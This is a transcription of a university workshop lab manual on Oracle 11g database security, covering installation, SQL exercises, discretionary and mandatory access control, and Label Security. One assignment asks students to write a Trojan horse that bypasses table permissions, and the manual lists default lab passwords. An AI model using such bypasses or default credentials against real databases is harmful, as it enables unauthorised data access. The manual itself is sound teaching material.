Lab Manual

Transcription

Lab Manual

Access
Control
Hands-on
Learning
May 21
φτυφ
NSF-SFS Summer Workshop at University of Tennessee at Chattanooga
Database
Security Using
Oracle 11g
University of Tennessee at Chattanooga
͟͠͞͠
Table of Contents
Project #1 Installing Oracle 11g Database .................................................................................................... 2
Project #1 Solution: Installing Oracle 11g Database ..................................................................................... 4
Project #2 Implement Discretionary Access Control and Exploit its Vulnerabilities .................................... 9
Project #3 Implement Mandatory Access Control Using Oracle Label Security ........................................ 11
Appendix: More tutorials on label security of Oracle. ................................................................................ 12
1
͟͠͞͠
Project #1 Installing Oracle 11g Database
Task One: Install oracle 11g database. (40 points)
Oracle Database Software Downloads is available at:
http://www.oracle.com/technology/software/products/database/index.html
Tutorial of Oracle installation is available at:
http://www.oracle.com/webfolder/technetwork/tutorials/obe/db/11g/r2/2day_dba/index.html
Tutorial of Installing Oracle Database 11g on Windows is available at:
http://st-curriculum.oracle.com/obe/db/11g/r2/2day_dba/install/install.htm
Oracle SQL Developer is a free graphical tool for database development. With SQL Developer, you can
browse database objects, run SQL statements and SQL scripts, and edit and debug PL/SQL statements.
You can also run any number of provided reports, as well as create and save your own. SQL Developer
enhances productivity and simplifies your database development tasks. More Info:
http://www.oracle.com/technology/products/database/sql_developer/files/what_is_sqldev.html
Tips:
a. To facilitate process of installation, you are recommended to create a virtual machine and then
install a clean Windows XP.
b. If your oracle is gone when you restart your computer, please go to
Control panel > administrator tools > services to check if OracleConsole is started.
Note: Type emctl start dbconsole if you are using pre-configured Linux from Oracle
Task Two: Create a database with the database schema in Chapter4.zip (30 points)
Task Three: Use SQL commands to manipulate the data, including the following (20 points)
a) count the number of unique department,
b) query an order,
c) insert a payment method and
2
͟͠͞͠
d) delete a product.
Task Four: Submit a written report including above activities. Please use screen shots to document
your results. (10 points)
Tips:
Alternatively, you can use Pre-Built Developer VMs (for Oracle VM VirtualBox)
http://www.oracle.com/technetwork/community/developer-vm/index.html. Just assemble the
downloaded files (if needed), import into VirtualBox (available for free), import, and go!
Uninstall Oracle database is not trivial, here are guides to uninstall Oracle manually from Windows XP
a. Uninstalling Oracle 10g Manually from Windows XP
Removing All Oracle Database Components
a) Stopping Oracle Services
b) Removing Components with Oracle Universal Installer
c) Manually Removing the Remaining Oracle Database Components
More: http://docs.oracle.com/cd/E11857_01/install.111/e16847/deinstall_em_gui.htm
3
͟͠͞͠
Project #1 Solution: Installing Oracle 11g Database
1. Double-click to open the VMWare player
2. Click File > Open a virtual machine
3. Browser to the folder of WindowsXP-sp3-oracle-label and select WindowXP-sp3.vmx
4. Click Open to open the virtual machine, then double-click WindowsXP-sp3.vmx
5. Select I copied it and click OK.
6. Click Yes
4
7. Open the web browser and enter address: https://127.0.0.1:1158/em.
8. Press Enter and click Yes to accept the certificate.
9. Enter system as user name and oracle as password,
10. then click Login
5
͟͠͞͠
11. Double-click sqldeveloper in the Desktop and browse the connection of sfs
6
͟͠͞͠
11. Exercises a several SQL statements
a. Count the number of unique departments using
SELECT COUNT (DISTINCT (DEPARTMENT_NAME))
FROM DEPARTMENTS
Click Run statement or Press CTRL+ENTER
There are 14 unique departments.
b. Query an order using
SELECT * FROM ORDERS WHERE ORDER_ID='539'
c. Insert a payment method using
INSERT INTO PAYMENT_METHOD VALUES ('10', 'Mobile phone')
7
͟͠͞͠
d. Delete a product using
DELETE FROM PRODUCT_PRICES WHERE PRODUCT_ID=’1000’;
DELETE FROM PRODUCT_SUPPLIER WHERE PRODUCT_ID=’1000’;
DELETE FROM PRODUCT_INVENTORY WHERE PRODUCT_ID=’1000’
8
͟͠͞͠
͟͠͞͠
Project #2 Implement Discretionary Access Control and Exploit its Vulnerabilities
Preparation was done in project #1:
• Create a database ORCL including CUSTOMERS, EMPLOYEES, ORDERS, JOBS, SALES_COMMISSION,
DEPARTMENTS, CATEGORIES, PRODUCT_INVENTORY, PROMOTIONS, PRODUCT_PRICES, SUPPLIERS,
PRODUCT_SUPPLIER, PAYMENT_METHOD, SHIPMENT_MEHTOD, AND EMPLOYEE_RANKS tables.
• Run Queries:
1. Display customer name, product name and purchased price and employee id.
2. Display number of orders placed by each customer.
Task One (50 points):
• Design your own security policies or use table 1 to 3 to define profiles, users, and roles.
• Define profiles (10 points).
• Define roles (10 points).
• Associate users with roles and profiles. (10 points)
• Test you DAC security policies
• If Alice can select Table Employee (5 points)
• If Alice can insert on Table Orders (5 points)
• If Ford can update Table Customers (5 points)
• If David can select Table Employee (5 points)
Tip: use database name when you execute your query. For example, Alice will be able to running the
following to select from a database named after system
select * from system.employees;
Task Two (40 points):
Trojan horse application can exploit vulnerabilities of DAC security policies. Write a Trojan horse
application so that David can access data in table Employee.
− Trojan horse application. (20 points)
− Demo of results. (20 points)
Task Three (10 points):
A written report to document your efforts. (10 points)
Table 1. Profile configuration requirements
Profile
Resource
DBSEC_ADMIN_PROF
Session_per_user = 5
Connect_time = 8 hours
Idle_time = 1 hour
DBSEC_DEVELOPER_PROF
Idle_time = 2 hours
CPU_per_call = 1 minute
DBSEC_CLERK_PROF
Session_per_user = 1
CPU_per_call = 5 seconds
Idle_time = 30 minutes
Logical_reads_per_call = 10KB
9
Password
Password_life_time = 1 month
Password_grace_time = 7
days
Password_life_time = 1 month
days
Failed_login_attempts = 1
Password_lock_time = 3 days
days
Table 2. User account configuration
User name
Role
Alice
Human_resources
Account_Manager
Bob
Customer_Service
Cathy
Sales
Customer_Service
David
Account_Manager
Edwards
Sales
Ford
Marketing
Table 3. Role and privilege matrix
Human_resources
Table
Select
Employee
√
Customer_Service
Table
Select
Customers
√
Orders
√
Account_Manager
Table
Select
Customers
√
Orders
√
͟͠͞͠
Profile
DBSEC_ADMIN_PROF
DBSEC_CLERK_PROF
DBSEC_CLERK_PROF
DBSEC_DEVELOPER_PROF
DBSEC_CLERK_PROF
DBSEC_CLERK_PROF
Insert
√
Update
√
Delete
X
Insert
Update
√
Delete
X
X
Insert
√
√
Update
√
√
Delete
X
X
Delete
X
X
Sales
Table
Customers
Orders
Select
√
√
Insert
Update
√
√
Marketing
Table
Customers
Orders
Select
√
√
Insert
Update
10
Delete
X
X
͟͠͞͠
Project #3 Implement Mandatory Access Control Using Oracle Label
Security
Prerequisites:
1. Install Oracle Database 11g, a database called ORCL
2. Install Oracle Database 11g with Label security; configure the database ORCL by adding label
security.
Tasks:
1.
2.
3.
4.
5.
6.
7.
8.
9.
Create users: Scott and Laura with “temp” as passwords for both.
Create a label security policy (S, C) with S>C (10 points)
Setting user authorization with Scott to be S and Laura to be C (10 points)
Applying the policy to tables EMPLOYEE_RANKS and EMPLOYEES. (10 points)
Applying the policy to data. The RANK of EMPLOYEE_RANKS is set to be S so that Laura cannot
access. The SALARY in EMPLOYEES table to be S if the DEPARTMENT ID is larger than or equal
to 60, and C otherwise. (20 points)
Testing the implementation of policy by connecting to the database using Scott and Laura’s
account. (10 points)
Run your Trojan horse application by Scott to see if Laura can copy data from EMPLOYEE_RANK
table. Report your observation. (10 points)
Testing invisible polyinstantiation by inserting an existing S data into the table EMPLOYEES by
Laura. (10 points)
Testing visible polyinstantiation by inserting an existing C data into the table EMPLOYEES by
Scott. (10 points)
Submit a written report to explain how you have accomplished above tasks. (10 points)
11
͟͠͞͠
Appendix: More tutorials on label security of Oracle.
Note: Use “Using oracle label security” in tutorial of Oracle 10g database as guidance.
http://www.oracle.com/technology/obe/10gr2_db_single/security/ols/ols_otn.htm
The information about Oracle Label security in the tutorial is as follows.
Test user hr with password hr is the owner of table locations after installation.
connect hr/hr
select * from locations
What you need?
One user who owns a database LOCATIONS, and grants privileges to created users -- hr
One user to create policy – LBACSYS
One security policy – ACCESS_LOCATIONS
One column appended to table LOCATIONS and hold security labels -- OLS_COLUMN
One user creates security levels and labels -- sec_admin
One user creates Users, Roles and binds with security labels -- hr_sec
Major steps:
1. create users (sec_admin, hr_sec, SKING, KPARTNER, and LDORAN)
2. create a policy
a. create a policy ‘ACCESS_LOCATIONS’ by lbacsys
b. lbacsys grants some executive rights (ACCESS_LOCATIONS_DBA) to sec_admin
(SA_COMPONENT) and hr_sec (SA_USER_ADMIN), so they can change the security
policy.
c. sec_admin create security level and labels: ‘SENS’, ‘CONF’, ‘PUB’
3. setting user authorization
a. HR_sec binds the labels to the users, defining their clearance.
b. Give owner HR the FULL access to the table
4. Applying a policy to a table, only HR can read the data, no label set yet.
5. Adding labels to the data by HR.
6. revoking Access from Admin Users (sec_admin, hr_sec), revoke ACCESS_LOCATIONS_DBA
7. Testing the Policy implementation by connecting to database from different user accounts.
12
User
Password and role
sysdba
Create, alter user, grant CREATE SESSION privilege
system
password: oracle
͟͠͞͠
create users: sec_admin and hr_sec with password welcome1
grant connect to emp_role
LBACSYS
password: LBACSYS
default Oracle DBA for Oracle Label Security (OLS)
After creating a policy
He has a role <policy_name>_DBA with ‘ADMIN’ option,
which allow him to grant execute on SA_COMPONENTS and execute on
SA_USER_ADMIN to other users such as sec_admin and HR_sec.
sec_admin
password: welcome1
Create levels and labels
hr_sec
password: welcome1
Maintain user-related part of the OLS, create database roles, users and
grants clearance to them. Bind labels to the users.
create role emp_role
create user SKING identified by welcome1
grant role emp_role to SKING
create user KPARTNER identified by welcome1
grant role emp_role to KPARTNER
13
͟͠͞͠
grant user LDORAN identified by welcome1
grant role emp_role to KPARTNER
hr
Password: hr
Owner of table locations, who determines the sensitivity of his data and
who will get access to which level of sensitivity.
Grant select to emp_role
Adding labels to the data
SKING
Password: welcome1
Labeled as ‘SENS’ by hr, owner of table locations
KPARTNER
Password: welcome1
Labeled as ‘CONF’ by hr, owner of table locations
LDORAN
Password: welcome1
Labeled as ‘PUB’ by hr, owner of table locations
Table name
Owner
LOCATIONS
A table owned by hr
Policy name
Creator and objective
ACCESS_LOCATIONS Creator is LBACSYS
14
͟͠͞͠
Control access to hr.LOCATIONS table
Colum name
objective
OLS_COLUMN
Name of the hidden column, will be appended to the hr.LOCATIONS table
Holds the data label.
Classified Users:
SKING (SENS)
KPARTNER (CONF)
LDORAN (PUB)
Labeled table:
City
country_id,
label_to_char (OLS_COLUMN)
Venice
IT
PUB
Hiroshima
JP
PUB
Southlake
US
PUB
South San Francisco
US
PUB
South Brunswick
US
PUB
Seattle
US
PUB
Toronto
CA
PUB
Whitehorse
CA
PUB
Bombay
IN
PUB
15
Sydney
AU
PUB
London
UK
PUB
Stratford
UK
PUB
Sao Paulo
BR
PUB
Geneva
CH
PUB
Bern
CH
PUB
Utrecht
NL
PUB
Mexico city
MX
PUB
Roma
IT
CONF
Oxford
UK
CONF
Munich
DE
CONF
Tokyo
JP
SENS
Beijing
CN
SENS
Singapore
SG
SENS
16
͟͠͞͠

Lab Manual

Transcription

Similar documents

Elogix – Oracle Practice - Elogix Software Pvt Ltd

UNITASK DIRECT PRINT

uu tn fllu [rnrln - School of Computing

Planning Xtream - MindStream Analytics

Oracle Audio

Providing comPrehensive, Personalised solutions for high net worth

Here

Oracle 10g release 2

Building and Deploying Web-Scale Social Networking Applications